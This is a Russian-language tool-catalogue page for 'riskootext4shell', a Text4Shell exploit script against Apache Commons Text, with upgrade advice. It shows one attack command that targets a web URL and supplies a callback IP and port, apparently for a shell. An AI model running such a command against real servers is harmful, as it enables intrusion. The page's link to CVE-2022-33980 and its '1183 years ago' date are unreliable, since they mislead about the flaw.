Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
riskootext4shell — text4shell скрипт для text coomons < =1.10 CVE-2022-33980 | Kitploit
Инструменты/GitHubGitHub/joseluisinigo/riskootext4shell
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubjoseluisinigo/riskootext4shell

riskootext4shell

text4shell скрипт для text coomons < =1.10 CVE-2022-33980

Репозиторий
1183 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

riskootext4shell

скрипт text4shell для text coomons < =1.10 CVE-2022-33980

  • Библиотека Apache Commons Text — это альтернатива нативным функциям JDK Java.
  • Версии Apache Commons до версии 1.10.0
  • Аналогична CVE-2022-33980
python3 text4shell.py -u http://192.168.245.111:8080/search?query= -i 192.168.111.186 -p 22

Меры по устранению

Основное решение — срочно обновить компонент Apache Commons Text до доступных версий, которые исправляют эту уязвимость. В частности, необходимо обновить Apache Commons Text до версии 1.10.0 или более поздней.

В этом обновлении было решено по умолчанию отключить проблемные подстановки. В файле changelog библиотеки указано следующее изменение:

Сделайте подстановки строк по умолчанию настраиваемыми через системное свойство. Удалите подстановки dns, url и script из значений по умолчанию. Если эти подстановки требуются для использования в StringSubstitutor.createInterpolator(), они должны быть включены через системное свойство. Подробности см. в StringLookupFactory.

Apache опубликовал официальное сообщение с информацией и ссылкой на обновление, в котором исправляется проблема.

Скачать инструмент